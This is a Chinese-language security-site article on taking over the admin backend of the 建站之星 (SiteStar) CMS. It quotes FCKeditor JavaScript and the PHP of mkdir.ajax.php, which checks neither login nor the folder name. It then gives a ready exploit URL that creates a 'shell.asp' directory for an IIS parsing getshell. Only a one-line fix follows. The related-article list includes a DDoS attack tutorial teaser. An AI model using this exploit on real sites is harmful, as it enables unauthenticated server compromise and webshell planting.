建站之星教程怎么获取建站之星后台的权限？

2018-01-29 20:50:47责编：llp 来源：驱动管家人气：

建站之星全版本后台通杀getshell的解析：

找到一个fck改的编辑器，准备用解析洞日之。

然后发现无法这玩意直接过滤了“.”创建不了解析文件夹，

反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后才会去掉。于是果断查看源码看函数：

复制代码

代码如下:

function addSort(obj) {

$(obj).parent().find(‘span’).css(‘display’,'inline-block’);

$(obj).css(‘display’,'none’);

$(obj).parent().find(‘span >input:first’).focus();

}

function newDir(obj) {

var pth = $(obj).prev().attr(‘value’);

var basepth = $(‘#gtcurdir option:selected’).text();

if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是判断如果文本框内不算以上字符长度等于0则继续执行.

alert(“请输入字符”);

$(obj).prev().focus();

return false;

} else {

$.ajax({

type : “GET”,

dataType : “text”,

url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。

success : function(response) {

switch (response) {

case ’0′:

$(obj).prev().val(”);

$(obj).parent().css(‘display’,'none’);

$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);

$(‘

break;

case ‘-1′:

alert(“文件夹已存在！”);

$(obj).prev().focus();

break;

case ‘-2′:

alert(“新建文件夹失败！”);

break;

}

error : function(response) {

alert(“请求失败！”);

return false;

}

});

}

看完函数发现有一个很有意思的地方：

url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,

这里直接post出去命令。那么我们可否构造呢

于是查看了这个脚本的源码：

复制代码

代码如下:

header(‘Conten-type:text/html; charset=UTF-8′);

define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));

$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));

define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));

$err = ’0′;

$basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量

$newdir = trim($_GET['newdir']);

// is or not exist dir

$hd = dir(“../../”.$basedir);

while(($path = $hd->read()) !== false) {

if ($path == $newdir) {

$err = ‘-1′;

break;

} else continue;

}

if ($err != ‘-1′) {

if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;

}

echo $err;

程序员果然天然呆，不验证登陆，这里不验证文件名，任凭urlpost任意信息。

到这里知道了程序漏洞所在。附上exp：

http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp

返回0则表示成功。

修复方案：

对mkdir.ajax.php加验证

kaspersky lab只用ssl加密不安全，远程暴力破解很简单！
Kaspersky 是一个俄罗斯杀毒软件专业厂商。其产品采用租赁销售方式，即任何人只能购买一段时间的使用期限，超过使用期限后除非再次购买期限否则不可再使用其软件。具体表现形式为：用户购买软件后根据序列号到Ka
详情2018-01-20 18:57:01责编：llp 来源：驱动管家
win7系统如何隐藏文件夹？创建带密码隐藏文件夹
Win7系统下如何创建带密码隐藏的文件夹保护个人隐私文件，按以下步骤进行操作：1、首先创建一个文件夹，并命名为“隐藏文件”;2、然后打开该文件夹，然后在窗口空白处右击鼠标选择“新建→ 文本文档”命令创
详情2018-01-19 10:19:55责编：llp 来源：驱动管家
防病毒技术电脑怎么设置才能防止病毒捆绑常用程序？
1、百毒不侵，权限这样设我们知道病毒等恶意程序经常把自己隐藏在windows(反健设置权限)系统目录中，如果对他的权限进行下设置，能够防止绝大部分的病毒。首先，确定你的系统目录没有任何病毒；右键单击c:windows
详情2018-01-20 18:00:24责编：llp 来源：驱动管家
电脑系统非法入侵的防范措施是什么？这七步设置可以防范非法入侵
本文通过七步设置介绍了针对Windows 2000和Windows XP操作系统如何防范非法用户入侵的“七招”。第一招：屏幕保护在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，
详情2018-01-24 20:07:28责编：llp 来源：驱动管家
ddos攻击教程：怎么增大ddos攻击的效果？
在我们的思维都朝着一个方向走的时候，忽然的转向会让人茅塞顿开。黑客在我眼中就是一群思维习惯不同的人，他们从不朝着同一个方向走，所以你才会被他们发现这么多的漏洞。一把手枪，四颗子弹，你能让子弹同时击
详情2018-01-17 13:31:03责编：llp 来源：驱动管家
永恒之蓝补丁是防范wannacry蠕虫勒索病毒的一种方法
背景5月12日晚，一款名为Wannacry的蠕虫勒索软件袭击全球网络，这被认为是迄今为止最巨大的勒索交费活动，影响到近百个国家上千家企业及公共组织。该软件被认为是一种蠕虫变种（也被称为“wannacryptor”或“wcry
详情2018-01-21 21:36:06责编：llp 来源：驱动管家
.net开发人员容易犯哪些安全错误？
微软已经为 Net环境添加了大量的功能，帮助开发人员创建安全的应用程序，例如，身份验证已经成为开发环境集成的一个功能，另外，默认情况下调试消息被禁用掉了。微软对安全的关注程度极大地影响了开发人员，促使
详情2018-01-24 15:38:36责编：llp 来源：驱动管家
什么是环境变量？path变量起什么作用？
首先，我们先了解下什么叫环境变量！环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数，比如临时文件夹位置和系统文件夹位置等等。这点有点类似于DOS时期的默认路径，当你运行某些程时序除了在当
详情2018-01-29 12:13:50责编：llp 来源：驱动管家
serv u提权溢出是什么原因？怎么解决？
仔细看下面的图片，发现什么了吗。SU的提权可以溢出(如何防止溢出驱动管家技术团队帮您解决服务器安全问题)，但是出错了。不是限制了cmd命令，注意Recv: 530 Not logged in, home directory does not ex
详情2018-01-26 09:32:07责编：llp 来源：驱动管家
木马制作的故事木马病毒产业链的诞生
在希腊神话里，特洛伊木马背后是一个凄美的故事。可在如今的互联网世界里，木马背后隐藏着的是一条罪恶的产业链。如果不是因为上周，徐州市鼓楼区人民法院对“温柔木马”等11名犯罪嫌疑人的公开审理，这个王国里
详情2018-01-10 19:22:38责编：llp 来源：驱动管家

建站之星教程 怎么获取建站之星后台的权限？

建站之星教程怎么获取建站之星后台的权限？